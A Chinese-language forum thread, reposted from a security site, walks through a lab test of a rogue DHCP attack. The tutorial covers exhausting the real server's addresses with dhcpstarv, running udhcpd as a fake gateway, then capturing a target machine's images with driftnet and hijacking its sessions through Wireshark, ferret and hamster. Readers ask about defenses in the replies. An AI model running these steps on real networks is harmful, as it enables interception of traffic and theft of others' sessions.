最新的backtrack5(bt5)官方网站已经提供下载,backtrack5是基于ubuntu Lucid LTS. 内核2.6.38开发的,完全开源并和GPL兼容。

Backtrack 中文网

 找回密码
 立即注册

QQ登录

只需一步,快速开始

扫一扫,访问微社区

搜索
查看: 4011|回复: 6

安全科普:流氓DHCP服务器内网攻击测试

[复制链接]
彩格
赤丹萱
通常内网渗透都是基于ARP的攻击,但ARP攻击对内网的负担太重,很容易被发现。今天讲的是基于DHCP协议的攻击。
基于DHCP的攻击理解起来很简单,首先伪造Mac地址耗竭正常的DHCP服务器的IP地址,然后黑客用自己的主机伪造一个DHCP服务器,那么新连上内网的主机只能使用流氓DHCP服务器分配的IP,这样黑客的主机就变成了内网网关,可以借此控制内网中其他主机的网络流量。

攻击环境
操作系统:Backtrack linux
网关: 192.168.177.1
IP地址: 192.168.177.128
网段:192.168.177.1/24
0×01 开启操作系统的路由转发
echo "1" >/proc/sys/net/ipv4/ip_forward
0×02 攻击正常的dhcp服务器,耗光ip资源
dhcpstarv -i eth0 -e 192.168.177.128
Backtrack默认没有安装dhcpstarv,也可以用yersinia代替
0×03 安装dhcp服务器udhcpd
# apt-get install udhcpd然后修改一下配置文件
# vim /etc/udhcpd.conf
0×04 启动DHCP服务器
service udhcpd start
然后启动另一台Backtrack机当作目标靶机,由于正常的DHCP服务器已经没有可分配的IP资源,新的内网主机就会使用攻击者DHCP服务器分配的IP
0×05 抓取目标靶机的图片
在攻击主机上开启driftnet
# driftnet -i eth0在目标靶机打开百度图片
在攻击者的服务器上就可以看到图像
0×06 会话劫持
开启wireshark抓取流经本地网卡的数据包,由于其他的机器走的是攻击者主机的网卡,这也意味着wireshark可以抓取其他主机的数据包
用ferret解析一下
# ferret -r demo.pcap
会在本地生成一个名为hamster.txt的文件
然后运行harmter,这会在主机开启1234端口
配置一下火狐代理
劫持成功
                                                                                                                                    转载请注明来自FreeBuf黑客与极客
+1
4020°C
6
  • HARDSBT
  • eddyboy
  • my1990210
  • liangxie
  • yuyongxr
过: 他们
理鹏天
薇初
  不 错,长见识了
柏骞
桑雁蓉
如果内网都是使用手工绑定,受到的威胁会不会少点呢?
召恬悦
彩弦
求问 为什么ferret -r不生成hamster.txt文件呢
宇星
贰韶丽
小白长知识了
星明知
龙潍
eddyboy 发表于 2015-9-2 18:58
如果内网都是使用手工绑定,受到的威胁会不会少点呢?

手动绑定只能避免伪装DHCP的攻击,ARP攻击手动绑定没用的
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

BackTrack是一套专业的计算机安全检测的Linux操作系统,简称BT。BackTrack 是一个基于Ubuntu GNU/Linux的发行版本,主要用做数字取证和入侵测试。它的名字引用自回溯法(backtracking)。BackTrack 给用户提供了大量功能强大但简单易用的安全工具软件。BackTrack还支持Live CD和Live USB启动方式,用户可以直接从移动介质启动该系统而不用将系统安装在硬盘上。BackTrack被设计成一体化的旨在安全审计用的livecd,曾经它是被最广泛采用的渗透测试框架并被世界各地的安全社区所使用。现在,BackTrack已被Kali Linux所代替,BT将不再维护。
快速回复 返回顶部 返回列表